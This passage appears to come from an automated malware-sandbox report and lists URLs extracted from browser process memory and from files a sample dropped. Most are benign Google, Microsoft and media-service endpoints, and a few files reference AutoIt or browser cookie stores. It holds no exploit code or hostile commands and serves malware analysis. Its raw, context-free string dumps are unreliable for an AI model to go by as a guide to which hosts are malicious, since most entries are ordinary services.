    Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/9
    Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/:
    Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/=
    Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
    Source: chrome.exe, 00000011.00000003.2821331354.0000513400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2778056090.000051340071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
    Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
    Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
    Source: msedge.exe, 00000015.00000002.2988279016.000002E400398000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
    Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
    Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
    Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://img-s-msn-com.akamaized.net/
    Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
    Source: aieukn.13.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
    Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
    Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
    Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
    Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
    Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
    Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
    Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
    Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
    Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
    Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
    Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
    Source: msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
    Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
    Source: chrome.exe, 00000011.00000003.2820036525.0000259801D38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
    Source: chrome.exe, 00000011.00000003.2820036525.0000259801D38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
    Source: chrome.exe, 00000011.00000003.2820036525.0000259801D38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard%
    Source: chrome.exe, 00000011.00000003.2821331354.0000513400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2778056090.000051340071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
    Source: chrome.exe, 00000011.00000003.2821331354.0000513400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2778056090.000051340071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
    Source: chrome.exe, 00000011.00000003.2778056090.000051340071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
    Source: chrome.exe, 00000011.00000003.2814373758.0000259801368000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808332227.0000259801368000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808790576.0000259801424000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808917731.000025980142C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808998412.0000259801434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814425177.0000259801384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
    Source: chrome.exe, 00000011.00000003.2794096473.000025980120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793983935.0000259801134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.0000259800304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
    Source: chrome.exe, 00000011.00000003.2794096473.000025980120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793983935.0000259801134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.0000259800304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
    Source: chrome.exe, 00000011.00000003.2821331354.0000513400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2778056090.000051340071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/2
    Source: chrome.exe, 00000011.00000003.2778674442.0000513400878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.0000259800304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
    Source: chrome.exe, 00000011.00000003.2778056090.000051340071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
    Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://m.kugou.com/
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://m.soundcloud.com/
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://m.vk.com/
    Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
    Source: chrome.exe, 00000011.00000003.2814373758.0000259801368000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808332227.0000259801368000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808790576.0000259801424000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808917731.000025980142C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808998412.0000259801434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814425177.0000259801384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
    Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
    Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
    Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
    Source: msedge.exe, 00000015.00000002.2988279016.000002E400398000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
    Source: msedge.exe, 00000015.00000002.2988279016.000002E400398000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
    Source: Cookies.24.drString found in binary or memory: https://msn.comXID/
    Source: Cookies.24.drString found in binary or memory: https://msn.comXIDv100o
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://music.amazon.com
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://music.apple.com
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://music.yandex.com
    Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
    Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://ntp.msn.cn/edge/ntp
    Source: 000003.log3.23.dr, 2cc80dabc69f58b6_0.23.drString found in binary or memory: https://ntp.msn.com
    Source: 000003.log9.23.dr, 000003.log0.23.drString found in binary or memory: https://ntp.msn.com/
    Source: 000003.log9.23.drString found in binary or memory: https://ntp.msn.com/0
    Source: 2cc80dabc69f58b6_1.23.dr, 000003.log9.23.drString found in binary or memory: https://ntp.msn.com/edge/ntp
    Source: 000003.log9.23.drString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
    Source: 2cc80dabc69f58b6_0.23.drString found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
    Source: msedge.exe, 00000015.00000002.2988279016.000002E400398000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
    Source: chrome.exe, 00000011.00000003.2814425177.0000259801384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
    Source: chrome.exe, 00000011.00000003.2814485401.0000259800BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
    Source: chrome.exe, 00000011.00000003.2814425177.0000259801384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
    Source: chrome.exe, 00000011.00000003.2814425177.0000259801384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://open.spotify.com
    Source: chrome.exe, 00000011.00000003.2791223886.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
    Source: chrome.exe, 00000011.00000003.2791223886.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
    Source: chrome.exe, 00000011.00000003.2791223886.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
    Source: chrome.exe, 00000011.00000003.2791223886.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
    Source: chrome.exe, 00000011.00000003.2791223886.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
    Source: chrome.exe, 00000011.00000003.2791223886.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
    Source: chrome.exe, 00000011.00000003.2791223886.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://outlook.live.com/mail/0/
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://outlook.office.com/mail/0/
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
    Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
    Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
    Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
    Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
    Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
    Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin0
    Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
    Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
    Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
    Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
    Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
    Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
    Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
    Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
    Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
    Source: chrome.exe, 00000011.00000003.2794096473.000025980120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793983935.0000259801134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.0000259800304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
    Source: chromecache_473.19.drString found in binary or memory: https://plus.google.com
    Source: chromecache_473.19.drString found in binary or memory: https://plus.googleapis.com
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
    Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
    Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
    Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
    Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
    Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
    Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://sb.scorecardresearch.com/
    Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
    Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
    Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://srtb.msn.cn/
    Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://srtb.msn.com/
    Source: chrome.exe, 00000011.00000003.2804100647.00002598002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
    Source: chrome.exe, 00000011.00000003.2814373758.0000259801368000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808332227.0000259801368000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808790576.0000259801424000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808917731.000025980142C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808998412.0000259801434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814425177.0000259801384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://tidal.com/
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://twitter.com/
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://vibe.naver.com/today
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://web.telegram.org/
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://web.whatsapp.com
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
    Source: chromecache_473.19.drString found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
    Source: aieukn.13.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
    Source: Cleveland.9.dr, Evans.com.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
    Source: aieukn.13.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://www.deezer.com/
    Source: lxlxt0.13.drString found in binary or memory: https://www.ecosia.org/newtab/
    Source: Cleveland.9.dr, Evans.com.2.drString found in binary or memory: https://www.globalsign.com/repository/0
    Source: chrome.exe, 00000011.00000003.2804100647.00002598002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
    Source: chrome.exe, 00000011.00000003.2804100647.00002598002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
    Source: chrome.exe, 00000011.00000003.2804100647.00002598002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: chrome.exe, 00000011.00000003.2787695410.0000259800CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
    Source: content.js.23.dr, content_new.js.23.drString found in binary or memory: https://www.google.com/chrome
    Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
    Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
    Source: Web Data.23.dr, lxlxt0.13.dr, 6xlx4w.13.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: chrome.exe, 00000011.00000003.2814373758.0000259801368000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808332227.0000259801368000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808790576.0000259801424000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808917731.000025980142C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808998412.0000259801434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814425177.0000259801384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
    Source: chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
    Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
    Source: chrome.exe, 00000011.00000003.2793760947.0000259800304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
    Source: chrome.exe, 00000011.00000003.2804100647.00002598002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
    Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
    Source: chromecache_473.19.drString found in binary or memory: https://www.googleapis.com/auth/plus.me
    Source: chromecache_473.19.drString found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
    Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
